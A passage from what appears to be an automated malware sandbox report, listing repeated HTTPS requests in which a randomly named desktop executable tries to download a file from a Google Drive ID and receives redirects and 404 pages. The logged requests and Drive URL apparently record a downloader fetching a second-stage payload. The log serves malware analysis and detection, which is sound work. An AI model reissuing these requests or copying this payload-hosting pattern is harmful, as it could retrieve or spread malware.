                                                        Content-Security-Policy: script-src 'nonce-dm_eShbXWWdSTWfPVXeZvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.1049985142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:47:32 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:47:32 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC49TlgbNJ4MQv2eaUgaA-9CgCmwnmnDQ9r64Rys15Oqi2ujB_KZDLkyiw4TCP6Z-FYV0hzdlrk
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:47:32 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-awSwz3-tz-B9Yo4_eOE0Iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:47:32 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 56 79 6c 38 48 73 76 58 66 54 54 71 67 71 6d 39 62 65 6c 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eVyl8HsvXfTTqgqm9beldw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.1049987216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:47:43 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:47:43 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:47:43 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-O2l3FHYaJFYrLMQ4LcfJzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.1049988142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:47:44 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:47:44 UTC1843INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6E1QVT-5mDz3-pViz9FjBGkptJcbK2KUKFEP-Uul6I7YVPdTo5IdRZVA6Wvkg8IFQ
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:47:44 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-q0Eev2NEi_zyL7mnjSFTeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:47:44 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 6d 76 69 54 62 57 75 39 35 6e 7a 49 51 66 65 5a 42 76 31 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tmviTbWu95nzIQfeZBv1Aw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.1049989216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:47:55 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:47:55 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:47:55 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-lzi1ZHsdPbqHTKItwaDvAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.1049990142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:47:56 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:47:57 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6ZN4-46VLyB1_d3_Rbklq2PTcBkllD0Iwls_iBq779Meh_4ZkZ4cWemkL8Bn35iIQeppN0Nuo
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:47:56 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-z6a4_edu3zkqGxDJ8kmPHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:47:57 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 61 71 5a 67 65 2d 64 75 6d 63 6e 43 67 61 62 64 59 4f 6c 54 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YaqZge-dumcnCgabdYOlTg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.1049991216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:48:07 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:48:08 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:48:07 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-C6uR69r8gdnBC7O4S50tSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.1049992142.250.185.974438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:48:08 UTC463OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ejk-9oCGHGbYyW5R7MIPRsLb005t8B4nq9nlVCgt8H6sTqln-CW80V_7LdkvBQ-r5OPilTtRkqh9PQjESiHSPxBzurGAgWaDZRJrLKfkDei-sIaqjJNVAEFB8iFmIKJ790__kxeDq9BEMRXS3ishCH7BJBAi_I6PKHQI7fhVSyh_9L05v6BHu0knAK4
                                                        2025-01-10 14:48:09 UTC1851INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFIdbgQQGiLojYIV7-PJv6RfB1PGHsJXA1JTkzGc2LjqoCnjbu_GNEkulYXVmDxgBUcGMc_8x6_F94A
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Fri, 10 Jan 2025 14:48:09 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-QXcaE4hGPt2Lxs3VnymKcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2025-01-10 14:48:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 64 47 33 70 53 71 44 41 61 57 69 46 67 43 75 38 4b 69 4a 35 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1dG3pSqDAaWiFgCu8KiJ5w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.1049993216.58.206.784438092C:\Users\user\Desktop\fTSt7dc60O.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-10 14:48:19 UTC421OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
